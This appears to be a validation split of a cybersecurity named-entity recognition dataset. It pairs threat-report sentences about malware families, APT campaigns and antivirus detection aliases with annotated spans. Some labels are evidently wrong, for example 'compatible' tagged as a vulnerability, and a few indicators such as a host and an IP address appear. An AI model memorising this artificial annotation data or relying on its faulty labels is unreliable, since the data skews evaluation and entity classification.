{"text": "The malware was even found on the phone of Argentinian prosecutor Alberto Nisman, who was murdered in a high-profile case earlier this year.", "spans": {"Malware: malware": [[4, 11]], "Organization: Argentinian prosecutor Alberto Nisman,": [[43, 81]]}, "info": {"id": "cyner2_valid_000395", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Backdoor.Subot.A Backdoor.Subot Backdoor.Subot.A Win32.Trojan.WisdomEyes.16070401.9500.9532 W32/Backdoor.CZN Backdoor.Trojan Win32/Subot.A Backdoor.Subot.A Backdoor.Win32.Subot.a Backdoor.Subot.A Trojan.Win32.Subot.cvpooc Backdoor.Win32.Z.Subot.44544 Backdoor.Subot.A Backdoor.Subot.A BackDoor.IRC.Subot BehavesLike.Win32.Spyware.pc W32/Backdoor.SGCC-5002 Backdoor/Subot.j BDS/Subot.A.1 Backdoor.Subot.A Backdoor.Win32.Subot.a Worm/Win32.IRCBot.R92359 IRC-Subot.dll Backdoor.Subot Win32/Subot.A Win32.Backdoor.Subot.Dwsp Backdoor.Subot!LkDRcBCLS3A Trojan.Win32.Subot W32/Subot.DLL!tr.bdr", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000396", "source": "cyner2_valid"}}
{"text": "] com hxxp : //mailsa-wqo [ .", "spans": {}, "info": {"id": "cyner2_valid_000397", "source": "cyner2_valid"}}
{"text": "There is also evidence to suggest that the actors behind Duuzer are spreading two other threats, detected as W32.Brambul and Backdoor.Joanap, to target more organizations in South Korea.", "spans": {"Malware: Duuzer": [[57, 63]], "Malware: threats,": [[88, 96]], "Organization: organizations": [[157, 170]]}, "info": {"id": "cyner2_valid_000399", "source": "cyner2_valid"}}
{"text": "The usage of the PlusShare API in 2020 denotes some unprofessional development , since this is the API to access Google+ .", "spans": {"System: PlusShare": [[17, 26]], "Organization: Google+": [[113, 120]]}, "info": {"id": "cyner2_valid_000400", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.Win32.VB!O Trojan.KillProc.A3 Trojan/VB.asy Win32.Trojan.VB.z W32/TrojanX.NAI Win32/Tnega.XXFMWcB TSPY_FAMALIS.A Trojan.Win32.VB.asy Trojan.Win32.VB.csnmkd W32.W.VB.l6tP TrojWare.Win32.VB.ASY Trojan.KillProc.16483 Trojan.VB.Win32.97860 TSPY_FAMALIS.A Backdoor.Win32.Bifrose W32/Trojan.WDEF-6301 Trojan/VB.cntm TR/Spy.Famalis.2 Trojan/Win32.VB Trojan:Win32/KillProc.P Trojan.Heur.bmLfrrUJ1Pkif Trojan.Win32.A.VB.22879[UPX] Trojan/Win32.Banker.R2087 Trojan.VB Win32/VB.ASY Trojan.VB!szSq0VUDjtM", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000401", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9951 W32/Trojan.FNFD-0051 Backdoor.Trojan Trojan.Win32.Spy TR/Spy.98304.594 Trojan.Heur.EB5C23 PWS:Win32/Tendrit.B Win32.Trojan.Spy.Pdcw Win32/Trojan.Spy.03b", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000402", "source": "cyner2_valid"}}
{"text": "If the device does not meet the criteria , it wo n't receive any data , otherwise , it will be redirected to a second server to receive a copy of the malware to install on their device .", "spans": {}, "info": {"id": "cyner2_valid_000403", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9998 Backdoor.MSIL.SpyGate.slb Trojan.Win32.Bladabindi.dkknqf Trojan.DownLoader10.46445 TrojanDropper:MSIL/Trosedo.A Trojan.Zusy.D1BDE0 Backdoor.MSIL.SpyGate.slb Trj/CI.A Win32.Trojan.Dropper.Hsiw Backdoor.MSIL.Fertile MSIL/Bladabindi.R!worm", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000405", "source": "cyner2_valid"}}
{"text": "Observe below the code routine for call recording .", "spans": {}, "info": {"id": "cyner2_valid_000406", "source": "cyner2_valid"}}
{"text": "A Russian-language phishing campaign active during the second week of August 2017, targeting not the usual banking customers, but the Russian banks themselves.", "spans": {"Organization: banking customers,": [[107, 125]], "Organization: the Russian banks": [[130, 147]]}, "info": {"id": "cyner2_valid_000408", "source": "cyner2_valid"}}
{"text": "Last month, CrowdStrike published a blog on malware campaigns attributed to Sakula.", "spans": {"Organization: CrowdStrike": [[12, 23]], "Malware: Sakula.": [[76, 83]]}, "info": {"id": "cyner2_valid_000409", "source": "cyner2_valid"}}
{"text": "What makes Ginp stand out is that it was built from scratch being expanded through regular updates , the last of which including code copied from the infamous Anubis banking Trojan , indicating that its author is cherry-picking the most relevant functionality for its malware .", "spans": {"Malware: Ginp": [[11, 15]], "Malware: Anubis": [[159, 165]]}, "info": {"id": "cyner2_valid_000410", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Backdoor.Win32.Netsnake!O Backdoor.Netsnake Backdoor/Netsnake.i Trojan.Graftor.D7A66 Win32.Trojan.WisdomEyes.16070401.9500.9999 Backdoor.Powerspider Backdoor.Win32.Netsnake.i Trojan.Win32.Netsnake.bskwtr Backdoor.W32.Netsnake.i!c BackDoor.Netsnake Backdoor.Netsnake.Win32.75 BehavesLike.Win32.Ipamor.cm Backdoor.Win32.Netsnake Trojan/PSW.PwdBox.f Trojan[Backdoor]/Win32.Netsnake Backdoor.Win32.Netsnake.i Backdoor.Netsnake Backdoor.Netsnake!9OLNh8b9sHY W32/Netsnake.I!tr.bdr", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000411", "source": "cyner2_valid"}}
{"text": "At any time an infected application will create an activity , this method will be called , and call ‘ requestAd ’ from “ Agent Smith ’ s code .", "spans": {"Malware: Agent Smith": [[121, 132]]}, "info": {"id": "cyner2_valid_000412", "source": "cyner2_valid"}}
{"text": "This malicious document connects to a perfectly legitimate website to download the final payload.", "spans": {"Malware: malicious document": [[5, 23]], "Malware: final payload.": [[83, 97]]}, "info": {"id": "cyner2_valid_000413", "source": "cyner2_valid"}}
{"text": "We've discovered a new malware family we've named TidePool.", "spans": {"Malware: malware family": [[23, 37]], "Malware: TidePool.": [[50, 59]]}, "info": {"id": "cyner2_valid_000414", "source": "cyner2_valid"}}
{"text": "Collect information on surrounding cellular towers ( BTS ) .", "spans": {}, "info": {"id": "cyner2_valid_000415", "source": "cyner2_valid"}}
{"text": "Like FakeDefender and DataLust , Charger could be an indicator of a wider effort by mobile malware developers to catch up with their PC ransomware cousins .", "spans": {"Malware: FakeDefender": [[5, 17]], "Malware: DataLust": [[22, 30]], "Malware: Charger": [[33, 40]]}, "info": {"id": "cyner2_valid_000416", "source": "cyner2_valid"}}
{"text": "Throughout September 2016 we have observed an actor sending malware to Canadian nationals by e-mail.", "spans": {"Malware: malware": [[60, 67]]}, "info": {"id": "cyner2_valid_000417", "source": "cyner2_valid"}}
{"text": "The source of this compromise was traced to an SSH brute force attack that took place earlier the same month.", "spans": {}, "info": {"id": "cyner2_valid_000419", "source": "cyner2_valid"}}
{"text": "It is now clear that a distinct industry has developed and is becoming more focused on extracting profits , which is clearly evident from the functionality of the malware .", "spans": {}, "info": {"id": "cyner2_valid_000420", "source": "cyner2_valid"}}
{"text": "We do not have evidence directly linking these attacks to a government source, but the information derived from these activities supports an assessment that a group or groups with motivations similar to the stated position of the Chinese government in relation to these targets is involved.", "spans": {"Organization: government": [[60, 70]], "Organization: the Chinese government": [[226, 248]]}, "info": {"id": "cyner2_valid_000421", "source": "cyner2_valid"}}
{"text": "The website of the Jerusalem Post was manipulated and linked to a harmful third party.", "spans": {"Organization: the Jerusalem Post": [[15, 33]]}, "info": {"id": "cyner2_valid_000423", "source": "cyner2_valid"}}
{"text": "We have seen this threat connect to a remote host, including: pic-save.pw using port 80", "spans": {"Malware: threat": [[18, 24]], "System: a remote host,": [[36, 50]]}, "info": {"id": "cyner2_valid_000424", "source": "cyner2_valid"}}
{"text": "The malware collects all data such as passwords, keystrokes and screenshots, then sends it to the attackers.", "spans": {"Malware: malware": [[4, 11]]}, "info": {"id": "cyner2_valid_000425", "source": "cyner2_valid"}}
{"text": "The malware targets Puma 5 ARM/Big Endian cable modems, including the ARRIS TG862 family.", "spans": {"Malware: malware": [[4, 11]], "Malware: Puma 5": [[20, 26]], "System: cable modems,": [[42, 55]], "System: ARRIS TG862 family.": [[70, 89]]}, "info": {"id": "cyner2_valid_000426", "source": "cyner2_valid"}}
{"text": "FireEye Labs recently detected a limited APT campaign exploiting zero-day vulnerabilities in Adobe Flash and a brand-new one in Microsoft Windows.", "spans": {"Organization: FireEye Labs": [[0, 12]], "Vulnerability: zero-day vulnerabilities": [[65, 89]], "System: Adobe Flash": [[93, 104]], "System: Microsoft Windows.": [[128, 146]]}, "info": {"id": "cyner2_valid_000427", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Heur.Corrupt.PE KIT/NGVCK.035.A Constructor:Win32/NGVCK.dam#2", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000428", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Backdoor/W32.Alcobot.71200 W32.Alcaul.N Win32.Trojan.WisdomEyes.16070401.9500.9999 Win32/Alcobot.A Win.Trojan.Sdbot-5 Trojan.Win32.Alcobot.dbgj Backdoor.W32.Alcobot!c Backdoor.Win32.Alcobot.A BackDoor.IRC.Sdbot.based Backdoor.Alcobot.Win32.1 BehavesLike.Win32.Backdoor.kh Backdoor/Alcobot.a W32/Alcaul.N.2 Trojan[Backdoor]/Win32.IRCBot Backdoor.IRCBot Bck/Sdbot.MQ Win32/Alcobot.A Win32.Backdoor.Ircbot.Hqbt Backdoor.Alcobot!xDJoHsLDI10 Backdoor.Win32.SdBot W32/IRCBot.GNE!tr", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000430", "source": "cyner2_valid"}}
{"text": "While all versions of Microsoft Windows the worm touched in the attack were compromised, a number of Windows XP machines crashed and failed to restart: despite its renewed potency, the programmers behind Qbothadn't built their bot to be compatible with older versions of Windows.", "spans": {"System: versions": [[10, 18]], "System: Microsoft Windows": [[22, 39]], "Malware: worm": [[44, 48]], "System: Windows XP machines": [[101, 120]], "Malware: Qbothadn't": [[204, 214]], "Malware: bot": [[227, 230]], "Vulnerability: compatible": [[237, 247]], "System: older versions of Windows.": [[253, 279]]}, "info": {"id": "cyner2_valid_000431", "source": "cyner2_valid"}}
{"text": "However , the malware wouldn ’ t want to depend on user interaction to trigger the ransomware screen , so , it adds another functionality of Android callback : As the code snippet shows , the malware overrides the onUserLeaveHint ( ) callback function of Activity class .", "spans": {"System: Android": [[141, 148]]}, "info": {"id": "cyner2_valid_000432", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Downloader.Ufraie.Win32.91 Trojan.Win32.Crypted.cnebvo Trojan/Vilsel.zrc TR/AD.Ufraie.bdftd Trojan/Win32.Vilsel Win32.Troj.Undef.kcloud Win32/TrojanDownloader.Ufraie.B Trojan.Win32.Vilsel Win32/Trojan.c5b", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000433", "source": "cyner2_valid"}}
{"text": "Here it is, the Kelihos botnet back with a bang.", "spans": {"Malware: Kelihos botnet": [[16, 30]]}, "info": {"id": "cyner2_valid_000436", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: W32.W.VBNA.tni6 Win32.Trojan.WisdomEyes.16070401.9500.9894 Trojan.Click.origin BehavesLike.Win32.Dropper.mc Win32.Hack.Rukap.gi.kcloud Trojan/Win32.Rukap.C27879 Trojan-PWS.Win32.LdPinch", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000437", "source": "cyner2_valid"}}
{"text": "The “ Agent Smith ” campaign serves as a sharp reminder that effort from system developers alone is not enough to build a secure Android eco-system .", "spans": {"Malware: Agent Smith": [[6, 17]], "System: Android": [[129, 136]]}, "info": {"id": "cyner2_valid_000440", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: JS.Pdfjsc.K JS/Exploit!JNLP.d JS.Exploit.Pdfka.ie JS/Crypted.DT JS_PIDIEF.SMC Exploit.Shellcode.BJ Exploit.JS.Pdfka.vn Exploit.Script.Pdfka.cfeira Exploit.PDF.869 JS_PIDIEF.SMC BehavesLike.PDF.Obfuscated.xb PDF/Obfusc.F!Camelot Trojan[Exploit]/JS.Pdfka.bf Exploit.JS.Pdfka.vn PDF/Pidief.ML Exploit.Shellcode.BJ Exploit.JS.Pdfka.vn Exploit.Win32.Pidief virus.exp.pdfjs", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000441", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: W32.ScaraNV.Trojan Trojan/W32.Scar.1222301 TrojanDropper.Scudy.S12799 WORM_SCUDY.SMA Trojan.Win32.A.Scar.876573 TrojWare.Win32.Scar.A Trojan.Click1.19227 Trojan/Scar.flx Trojan.Midie.D8D49 Trojan/Win32.Scar.R45219 Trojan.Scar Trojan.Dropper Trojan.Scar!3JbHUSbGsGc", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000443", "source": "cyner2_valid"}}
{"text": "What it does The surveillance functionality of Desert Scorpion resides in a second stage payload that can only be downloaded if the victim has downloaded , installed , and interacted with the first-stage chat application .", "spans": {"Malware: Desert Scorpion": [[47, 62]]}, "info": {"id": "cyner2_valid_000444", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9993 W32/Trojan.RVEQ-2899 Trojan.Win32.SchoolBoy.ath Trojan.Win32.Renaz.cythcw Trojan.KillProc.14048 BehavesLike.Win32.Backdoor.lm TR/Renaz.3584.1 Trojan.Win32.SchoolBoy.ath TrojanDropper:Win32/Lucuis.A Trojan/Win32.CSon.R8749 BScope.P2P-Worm.Palevo Trj/CI.A Win32.Trojan.Schoolboy.Eddr Trojan.PWS.OnLineGames!IrZfNSgvphg Backdoor.Win32.Poison Win32/Trojan.95c", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000445", "source": "cyner2_valid"}}
{"text": "Clicking on thenotification will result in launching a specified app startApp Starts the specified application getInstallApps Gets the list of installedapplications on the infected device getContacts Gets the contact names and phone numbers from the addressbook on the infected device deleteApplication Triggers the deletion of the specified application forwardCall Enables call forwarding to the specified number sendSms Sends a text message with specified text from the infecteddevice to the specified phone number startInject Triggers the overlay attack against the specified application startUssd Calls the specified USSD code openUrl Opens the specified URL in the WebView getSMS Gets all text messages from the infected device killMe Triggers the kill switch for the bot updateModule Updates the payload module Cerberus features Cerberus malware has the same capabilities as most other Android banking Trojans such as the use of overlay attacks , SMS control and contact list harvesting .", "spans": {"Malware: Cerberus": [[817, 825], [835, 843]], "System: Android": [[892, 899]]}, "info": {"id": "cyner2_valid_000446", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9997 Backdoor.Trojan Trojan.Win32.HideBaid.dzvwho Trojan.Win32.Z.Zusy.45421 Trojan.Baidu.1671 BehavesLike.Win32.Dropper.pt W32/Trojan.LSBJ-7344 Trojan.Zusy.D2C124 Trj/CI.A", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000448", "source": "cyner2_valid"}}
{"text": "Mandiant has observed Russian nation-state attackers APT29 employing domain fronting techniques for stealthy backdoor access to victim environments for at least two years.", "spans": {"Organization: Mandiant": [[0, 8]], "Malware: backdoor": [[109, 117]], "System: victim environments": [[128, 147]]}, "info": {"id": "cyner2_valid_000449", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.DownLoader.17329 Trojan.Horst.Win32.3637 BehavesLike.Win32.Sality.cm Trojan-Proxy.Win32.Horst TrojanProxy.Horst.gi Trojan[Proxy]/Win32.Horst Trojan/Win32.Horst.C106446 MalwareScope.Trojan-Proxy.Horst.1 W32/Medbot.DS!tr", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000450", "source": "cyner2_valid"}}
{"text": "Symantec has found that South Korea is being impacted by an active back door Trojan, detected as Backdoor.Duuzer.", "spans": {"Organization: Symantec": [[0, 8]], "Malware: back door Trojan,": [[67, 84]]}, "info": {"id": "cyner2_valid_000451", "source": "cyner2_valid"}}
{"text": "For traffers that is, actors bringing traffic to a malicious destination; for example, exploit kits that rely on malvertising, one of the goals is to gain access to a high-profile ad network such as DoubleClick, Bing Ads, AdTech or AppNexus.", "spans": {"Malware: exploit kits": [[87, 99]], "Organization: high-profile ad network": [[167, 190]], "Organization: DoubleClick, Bing Ads, AdTech": [[199, 228]]}, "info": {"id": "cyner2_valid_000452", "source": "cyner2_valid"}}
{"text": "The IP address of this website is 115.144.107.55.", "spans": {}, "info": {"id": "cyner2_valid_000453", "source": "cyner2_valid"}}
{"text": "However, by late August 2017, this campaign began pushing a different type of malware.", "spans": {"Malware: malware.": [[78, 86]]}, "info": {"id": "cyner2_valid_000455", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan/W32.Hesv.303104 Trojan.Hesv.Win32.40 Trojan/Injector.dsqm Win32.Trojan.WisdomEyes.16070401.9500.9751 Trojan.Trickybot Trojan.Win32.Hesv.bnqd Trojan.Win32.Hesv.etvgle Trojan.DownLoader25.46858 BehavesLike.Win32.PWSZbot.dc Trojan.Hesv.fs TR/AD.Inject.ssylq Trojan.Win32.Hesv.bnqd Trojan/Win32.Hesv.R210998 Trojan.Hesv Spyware.TrickBot Trojan.Hesv!", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000456", "source": "cyner2_valid"}}
{"text": "From what we've seen, ChessMaster is continuously evolving, using open source tools and ones they developed, likely as a way to anonymize their operations.", "spans": {"Malware: ChessMaster": [[22, 33]], "Malware: open source tools": [[66, 83]]}, "info": {"id": "cyner2_valid_000457", "source": "cyner2_valid"}}
{"text": "It usually impersonates flash player updaters, android system tools, or other legitimate applications.", "spans": {"System: android system tools,": [[47, 68]], "System: legitimate applications.": [[78, 102]]}, "info": {"id": "cyner2_valid_000458", "source": "cyner2_valid"}}
{"text": "Scammers do so by riding on the popularity of existing applications, embedding them with unwanted content—even malicious payloads—and masquerading them as legitimate.", "spans": {}, "info": {"id": "cyner2_valid_000459", "source": "cyner2_valid"}}
{"text": "The Executive Yuan has several individual boards which are formed to enforce different executing functions of the government.", "spans": {"Organization: The Executive Yuan": [[0, 18]], "Organization: individual boards": [[31, 48]], "Organization: government.": [[114, 125]]}, "info": {"id": "cyner2_valid_000460", "source": "cyner2_valid"}}
{"text": "He can, for example, configure MalumPoS to include Radiant or NCR Counterpoint PoS systems to its target list.", "spans": {}, "info": {"id": "cyner2_valid_000462", "source": "cyner2_valid"}}
{"text": "] 213 To backdoor legitimate applications , attackers used a Smali injection technique – a type of injection that allows attackers to disassemble the code of original app with the Baksmali tool , add their malicious code , and assemble it with Smali .", "spans": {}, "info": {"id": "cyner2_valid_000463", "source": "cyner2_valid"}}
{"text": "ITG08 likely gains initial access to victim networks by using stolen login credentials belonging to users of the victim organization or to users of trusted third-party entities which had remote access to the victim's network i.e. VPN access.", "spans": {"System: victim networks": [[37, 52]], "Organization: victim organization": [[113, 132]], "Malware: remote access": [[187, 200]], "System: victim's network": [[208, 224]], "System: VPN": [[230, 233]]}, "info": {"id": "cyner2_valid_000464", "source": "cyner2_valid"}}
{"text": "Government agencies and enterprises should plan to be hit from all angles - cloud services , mobile devices , laptops - in order to build comprehensive security strategies that work .", "spans": {}, "info": {"id": "cyner2_valid_000465", "source": "cyner2_valid"}}
{"text": "This kind of malware, as mentioned in previous posts Dridex, Bartallex, usually arrives as an attached document within a phishing email.", "spans": {"Malware: malware,": [[13, 21]], "Malware: Dridex, Bartallex,": [[53, 71]]}, "info": {"id": "cyner2_valid_000466", "source": "cyner2_valid"}}
{"text": "Once the targeted website is launched , the malware uses the JavaScript code to locate and click on banners from the Google ads infrastructure .", "spans": {"System: Google ads": [[117, 127]]}, "info": {"id": "cyner2_valid_000467", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Win.Trojan.Dropper-20281 Trojan.Win32.Chomioy.ewrfrb Trojan.DownLoader5.48130 TR/AD.Chomioy.pwiho Trojan:Win32/Chomioy.A", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000468", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: HW32.Packed.2AA9 Win32.Trojan.WisdomEyes.16070401.9500.9997 Trojan.Clampi Trojan.Win32.FKM.ewldln BehavesLike.Win32.Virut.gc Trojan.Win32.Pakes Trojan.DNSChanger-Installer Win32/Trojan.36b", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000469", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: VEXB204.Webshell Backdoor.PHP.A PHP/C99shell.R Backdoor.PHP.C99Shell.A PHP.Backdoor.C99Shell.d PHP/CShell.Y Backdoor.Trojan PHP/C99Shell.A Php.Trojan.C99Shell-2 Backdoor.PHP.C99Shell.p Backdoor.PHP.A Trojan.Script.C99Shell.wahxr Backdoor.Win32.C99Shell.2622[h] Backdoor.PHP.C99Shell.p!c Backdoor.PHP.A Backdoor.PHP.A PHP.Rst.5 PHP_C99SHELL.AB BehavesLike.JS.Backdoor.cm PHP/CShell.Y PHP/C99Shell.B PHP/C99shell.BGT!tr Trojan[Backdoor]/PHP.C99Shell Backdoor.PHP.A Backdoor.PHP.C99Shell.p Backdoor:PHP/C99shell.U PHP/C99shell.E Backdoor.PHP.C99Shell.y Php.Backdoor.C99shell.Pcsh PHP.ShellBot.K Trojan.Php.C99shell Backdoor.PHP.A PHP/BackDoor.DK HackTool/PHPC99Shell.B php.script.c99shell.10", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000470", "source": "cyner2_valid"}}
{"text": "In this case , like others before , the event of a popular game release became an opportunity to trick unsuspecting users into downloading the RAT .", "spans": {}, "info": {"id": "cyner2_valid_000471", "source": "cyner2_valid"}}
{"text": "Specifically , Lookout determined these were trojanized versions of the apps SR Chat and YeeCall Pro .", "spans": {"Organization: Lookout": [[15, 22]], "System: SR Chat": [[77, 84]], "System: YeeCall Pro": [[89, 100]]}, "info": {"id": "cyner2_valid_000472", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Backdoor.Xifos BKDR_XIFOS.D Win32.Trojan.WisdomEyes.16070401.9500.9999 W32/Trojan.KIOQ-6335 BKDR_XIFOS.D BackDoor.Foxy.5 TR/Spy.13824.248 Trojan/Win32.Unknown Backdoor:Win32/Xifos.A Downloader/Win32.Small.C61027 BScope.Trojan-Spy.Zbot Win32.Trojan.Spy.Ssqx Trojan.Win32.Spy", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000473", "source": "cyner2_valid"}}
{"text": "Two weeks ago , Some Chinese Security Researchers have also detected a bootkit called 'Oldboot ' , possibly the same malware or another variant of it .", "spans": {}, "info": {"id": "cyner2_valid_000474", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Risktool.Bitminer Worm.Win32.Dropper.RA Trojan.Trick.45126 RiskTool.BitCoinMiner.eni RiskWare[RiskTool]/Win32.BitCoinMiner Trojan:Win32/Sminager.E Trojan/Win32.BitcoinMiner.C2186503 Trojan.CoinMiner Trj/GdSda.A", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000475", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: HackTool.MSIL Win32.Trojan.WisdomEyes.16070401.9500.9641 Hacktool.Msil.Flooder!c HackTool.Win32.Oylecann HackTool/MSIL.Flooder HackTool:Win32/Oylecann.A Win32/Trojan.Flooder.211", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000476", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: W32.Wisdwsl.Trojan Worm.Necast.FC.76 Backdoor.W32.Delf.lrP1 Trojan.MSIL.Cryptos Trojan.Win32.Infexor.cwybmt BackDoor.Infexor.77 Backdoor/MSIL.vy Trojan/Win32.Unknown Trojan.MSIL.Androm.3 Trojan/Win32.Cryptos.R67663 Trojan.Cryptos!GHq1HMEra4U Virus.ILCrypt MSIL/Dropper.XT!tr", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000477", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.Flooder.ICMP.Angryping.A Trojan/W32.Flooder.18432.B Trojan.Flooder.ICMP.Angryping.A Trojan/Flooder.AngryPing Win32.Trojan.WisdomEyes.16070401.9500.9978 TROJ_AGPING.A Trojan.Flooder.ICMP.Angryping.A Flooder.Win32.AngryPing Trojan.Flooder.ICMP.Angryping.A Trojan.Win32.AngryPing.fufp Spyware.Flooder.18432 Win32.Trojan.Angryping.Tbis TrojWare.Win32.Flooder.ICMP.A Trojan.Flooder.ICMP.Angryping.A FDOS.Agp Tool.AngryPing.Win32.1 TROJ_AGPING.A BehavesLike.Win32.Koutodoor.lc W32/Risk.MARN-2654 Flooder.ICMP.AngryPing TR/Flood.ICMP.AngryPing HackTool[Flooder]/Win32.AngryPing Win32.Hack.AngryPing.kcloud Trojan.Flooder.ICMP.Angryping.A Flooder.W32.AngryPing!c Flooder.Win32.AngryPing Trojan:Win32/AGPing.A Trojan.Flooder.ICMP.Angryping.A Win32/Flooder.ICMP.AngryPing.A Flooder.ICMP.AngryPing HackTool.Win32.IISCrack W32/AngryPing.A!tr Flooder.AngryPing Flooder/Angryping.B Win32/Trojan.Hack.a29", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000479", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.Taec.FC.1967 Win32.Trojan.WisdomEyes.16070401.9500.9909 Trojan.Win32.Drop.ecxfhb TrojWare.MSIL.Scar.LR Trojan.MulDrop6.38915 Trojan.Tpyn.Win32.33568 Trojan.Win32.Dynamer Troj.Msil.Tpyn!c Trojan:Win32/Dibizor.A!bit Trojan/Win32.Tpyn.R209021 Trojan.Scar Adware.HPDefender Trj/CI.A Win32/Trojan.9a1", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000480", "source": "cyner2_valid"}}
{"text": "In February 2016, Unit 42 published detailed analysis of Locky ransomware.", "spans": {"Organization: Unit 42": [[18, 25]], "Malware: Locky ransomware.": [[57, 74]]}, "info": {"id": "cyner2_valid_000481", "source": "cyner2_valid"}}
{"text": "The attacker decided to prepare 3 different binaries to cover 3 different architectures.", "spans": {}, "info": {"id": "cyner2_valid_000482", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.Dacic.FC.1014 Win32.Trojan.WisdomEyes.16070401.9500.9996 Trojan.Win32.Clicker!BT Trojan.MSIL.TrojanClicker Trojan.MSIL.7 TrojanClicker:MSIL/Peadclik.A Trojan.Win32.Clicker!BT Trj/GdSda.A", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000483", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9999 BehavesLike.Win32.Trojan.cc", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000484", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Backdoor.Perl.Shellbot.F Perl/Shellbot.FS Backdoor.Perl.Shellbot.F Perl.Backdoor.Shellbot.f Perl.Pircbot Perl/Shellbot.NAI PERL_SHELLBOT.SM Win.Trojan.IRCBot-785 Backdoor.Perl.Shellbot.F Backdoor.Perl.IRCBot.ml Backdoor.Perl.Shellbot.F Trojan.Script.Shellbot.dnqthd Backdoor.Perl.Shellbot.F Backdoor.Perl.Shellbot.F Perl.Ircbot.142 PERL_SHELLBOT.SM Trojan.XQYH-6 Trojan[Backdoor]/Perl.IRCBot.ml Backdoor:HTML/Derflop.A Backdoor.Perl.Ircbot!c Backdoor.Perl.IRCBot.ml Perl.Backdoor.Ircbot.Lmun Trojan.Perl.Shellbot Perl/ShellBot.NAK!tr", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000485", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Backdoor.RUX.5.0 Backdoor.RUX.5.0 Trojan.Win32.RUX.bmcmu Backdoor.Trojan Win32/RUX.50 BKDR_RUX.C Trojan.RUX.Server Backdoor.Win32.RUX.50 Backdoor.RUX.5.0 Backdoor.RUX!mlwlYwUsz/c Backdoor.Win32.RUX.50.Server Backdoor.RUX.5.0 BackDoor.RUX.50 BDS/RUX.50.Srv BKDR_RUX.C Backdoor/RUX.50 Win32.Hack.RUX.s.kcloud Backdoor:Win32/Rux.5_0 Backdoor.Win32.RUX_50.Svr Win-Trojan/RUX.73728 Backdoor.RUX.5.0 Backdoor.Trojan Win32/RUX.50.Server Backdoor.RUX.50 Backdoor.Win32.RUX.50 W32/BackDoor.Rux.50 BackDoor.RUX Bck/TheTick.50", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000486", "source": "cyner2_valid"}}
{"text": "Those apps use the same techniques to monetize their actions .", "spans": {}, "info": {"id": "cyner2_valid_000487", "source": "cyner2_valid"}}
{"text": "The malware searches both internal and external storage and encrypts them using RC4 .", "spans": {}, "info": {"id": "cyner2_valid_000488", "source": "cyner2_valid"}}
{"text": "The configuration contains a list of steps to execute with URLs and JavaScript .", "spans": {}, "info": {"id": "cyner2_valid_000490", "source": "cyner2_valid"}}
